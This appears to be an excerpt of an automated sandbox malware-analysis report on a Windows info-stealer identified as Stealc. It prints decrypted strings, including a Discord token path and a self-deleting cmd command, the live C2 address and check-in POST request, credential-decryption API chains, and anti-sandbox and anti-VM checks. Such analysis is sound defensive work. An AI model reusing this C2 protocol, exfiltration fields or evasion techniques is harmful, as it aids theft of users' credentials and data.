                Source: 0.2.file.exe.180000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.180000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.180000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.180000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.180000.0.unpackString decryptor: https
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.180000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.180000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.180000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.180000.0.unpackString decryptor: build
                Source: 0.2.file.exe.180000.0.unpackString decryptor: token
                Source: 0.2.file.exe.180000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.180000.0.unpackString decryptor: file
                Source: 0.2.file.exe.180000.0.unpackString decryptor: message
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.180000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00199030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0018A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0018A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_001872A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0018C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0018E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00181710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00193B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00193B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00194B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00194B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0018DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0018EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0018BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 36 30 38 34 46 37 43 45 39 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="hwid"06084F7CE903204970075------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="build"tale------CAEHJEBKFCAKKFIEHDBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001862D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_001862D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 36 30 38 34 46 37 43 45 39 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="hwid"06084F7CE903204970075------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="build"tale------CAEHJEBKFCAKKFIEHDBF--
                Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/4
                Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/c
                Source: file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php6
                Source: file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpS
                Source: file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpk
                Source: file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/Z
                Source: file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/_
                Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206j
                Source: file.exe, file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC0330_2_005CC033
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D60240_2_005D6024
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C00980_2_001C0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E0DE0_2_0052E0DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B80890_2_005B8089
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B21380_2_001B2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DF1020_2_005DF102
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DB1980_2_001DB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB26C0_2_005DB26C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001EE2580_2_001EE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C42880_2_001C4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0020B3080_2_0020B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DD3290_2_005DD329
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FD39E0_2_001FD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064F3F20_2_0064F3F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C54A60_2_005C54A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CF5050_2_005CF505
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AE5440_2_001AE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A45730_2_001A4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C45A80_2_001C45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001ED5A80_2_001ED5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DB5A70_2_004DB5A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FA6480_2_001FA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D96D50_2_005D96D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C66C80_2_001C66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002096FD0_2_002096FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DD7200_2_001DD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001F67990_2_001F6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052D78C0_2_0052D78C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053F8350_2_0053F835
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D48680_2_001D4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D98B80_2_001D98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DB8A80_2_001DB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001EF8D60_2_001EF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059690C0_2_0059690C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CD9F10_2_005CD9F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004809900_2_00480990
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D2A750_2_005D2A75
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00532ABF0_2_00532ABF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001F0B880_2_001F0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001F4BA80_2_001F4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FAC280_2_001FAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AFCEE0_2_006AFCEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056FC8A0_2_0056FC8A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001EAD380_2_001EAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B1D780_2_001B1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DBD680_2_001DBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D5DB90_2_001D5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4DC80_2_001D4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C8E780_2_001C8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001F1EE80_2_001F1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D0F920_2_005D0F92
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00184610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: fefgvzwf ZLIB complexity 0.9950002834038694
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00199790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00193970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00193970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Z2KV232P.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2131968 > 1048576
                Source: file.exeStatic PE information: Raw size of fefgvzwf is bigger than: 0x100000 < 0x19d800
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.180000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fefgvzwf:EW;bzufikti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fefgvzwf:EW;bzufikti:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00199BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x216f66 should be: 0x20989c
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: fefgvzwf
                Source: file.exeStatic PE information: section name: bzufikti
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B6022 push 7A87A743h; mov dword ptr [esp], eax0_2_006B6048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 6D408F3Fh; mov dword ptr [esp], ebp0_2_005CC0D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push ebp; mov dword ptr [esp], 39ED2AA2h0_2_005CC0E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push esi; mov dword ptr [esp], 69324C16h0_2_005CC16E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 4FA1C48Ch; mov dword ptr [esp], edx0_2_005CC19B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push eax; mov dword ptr [esp], 6B37CEACh0_2_005CC226
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 2FE8686Ah; mov dword ptr [esp], ecx0_2_005CC28C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push edx; mov dword ptr [esp], eax0_2_005CC2F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push ebx; mov dword ptr [esp], esi0_2_005CC350
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push eax; mov dword ptr [esp], 44C22BD0h0_2_005CC3F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 03A6403Bh; mov dword ptr [esp], edx0_2_005CC56B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push edx; mov dword ptr [esp], 1C6FEE32h0_2_005CC571
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push esi; mov dword ptr [esp], ecx0_2_005CC658
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push edi; mov dword ptr [esp], ebx0_2_005CC66B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 01BACB50h; mov dword ptr [esp], esi0_2_005CC69E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 74F44545h; mov dword ptr [esp], ebp0_2_005CC6DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push esi; mov dword ptr [esp], 0317CC5Ah0_2_005CC71E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push ebx; mov dword ptr [esp], 7BBFBE9Ch0_2_005CC79D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 0B0DADB2h; mov dword ptr [esp], edx0_2_005CC81C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push edi; mov dword ptr [esp], 5EFF3A01h0_2_005CC83B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push ecx; mov dword ptr [esp], edi0_2_005CC867
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 0E8C3DAFh; mov dword ptr [esp], esi0_2_005CC88A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push ebx; mov dword ptr [esp], eax0_2_005CC8B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 3581106Dh; mov dword ptr [esp], ebx0_2_005CC8BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push edx; mov dword ptr [esp], ebp0_2_005CC9B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push eax; mov dword ptr [esp], 2BAD7DE1h0_2_005CC9EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push ebx; mov dword ptr [esp], edi0_2_005CCA5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 020B9A60h; mov dword ptr [esp], edx0_2_005CCA64
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 4E504852h; mov dword ptr [esp], ebp0_2_005CCAED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push 360FFDE2h; mov dword ptr [esp], edi0_2_005CCB88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC033 push esi; mov dword ptr [esp], ecx0_2_005CCB8C
                Source: file.exeStatic PE information: section name: fefgvzwf entropy: 7.95427162698335

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00199BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36549
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46E39D second address: 46DBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC070C93707h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC070C93704h 0x00000011 nop 0x00000012 jmp 00007FC070C936FEh 0x00000017 push dword ptr [ebp+122D0571h] 0x0000001d jns 00007FC070C936FCh 0x00000023 call dword ptr [ebp+122D273Eh] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov ebx, dword ptr [ebp+122D2A99h] 0x00000031 movzx ebx, bx 0x00000034 popad 0x00000035 pushad 0x00000036 mov esi, dword ptr [ebp+122D2BADh] 0x0000003c mov esi, dword ptr [ebp+122D29FDh] 0x00000042 popad 0x00000043 xor eax, eax 0x00000045 stc 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a xor dword ptr [ebp+122D1D52h], ecx 0x00000050 jne 00007FC070C93708h 0x00000056 mov dword ptr [ebp+122D2BD9h], eax 0x0000005c jmp 00007FC070C93705h 0x00000061 mov dword ptr [ebp+122D1D52h], eax 0x00000067 mov esi, 0000003Ch 0x0000006c jmp 00007FC070C936FEh 0x00000071 add esi, dword ptr [esp+24h] 0x00000075 jmp 00007FC070C936FAh 0x0000007a lodsw 0x0000007c jmp 00007FC070C93703h 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 jne 00007FC070C93710h 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f jg 00007FC070C93714h 0x00000095 push eax 